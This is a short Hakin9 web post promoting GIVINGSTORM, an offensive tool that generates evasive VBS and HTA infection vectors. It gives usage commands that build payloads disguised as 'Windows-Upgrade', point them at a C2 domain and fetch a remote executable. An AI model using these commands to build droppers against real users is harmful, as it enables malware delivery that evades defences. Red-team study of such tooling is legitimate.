GIVINGSTORM - Infection vector that bypasses AV, IDS, and IPS. (For now...)

(80 views)

The beginnings of a C2 framework. Currently without all the C2 stuff so far. Generates a dual-stage VBS infection vector, and a dual-stage HTA infection vector. The variables take into account C2 addresses, Koadic/Empire payloads, and a few delivery mechanisms. The payload files are output to an aptly named directory "Payloads" that is created if not already present. Installation & Usage GIVINGSTORM is a breeze to use. Simply clone the directory, and cd into it. For the HTA payload: python3 GIVINGSTORM.py -n Windows-Upgrade -p b64encodedpayload -c amazon.com/c2/domain HTA Example For the Macro Subroutine: python3 GIVINGSTORM.py -n Windows-Upgrade -e amazon.com/final/payload.exe Macro Example More: https://github.com/nins3i/GIVINGSTORM

July 13, 2020

Author

Hakin9 TEAM
Hakin9 is a monthly magazine dedicated to hacking and cybersecurity. In every edition, we try to focus on different approaches to show various techniques - defensive and offensive. This knowledge will help you understand how most popular attacks are performed and how to protect your data from them. Our tutorials, case studies and online courses will prepare you for the upcoming, potential threats in the cyber security world. We collaborate with many individuals and universities and public institutions, but also with companies such as Xento Systems, CATO Networks, EY, CIPHER Intelligence LAB, redBorder, TSG, and others.
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2023

Download Free eBook

Step 1 of 4

Name(Required)

We’re committed to your privacy. Hakin9 uses the information you provide to us to contact you about our relevant content, products, and services. You may unsubscribe from these communications at any time. For more information, check out our Privacy Policy.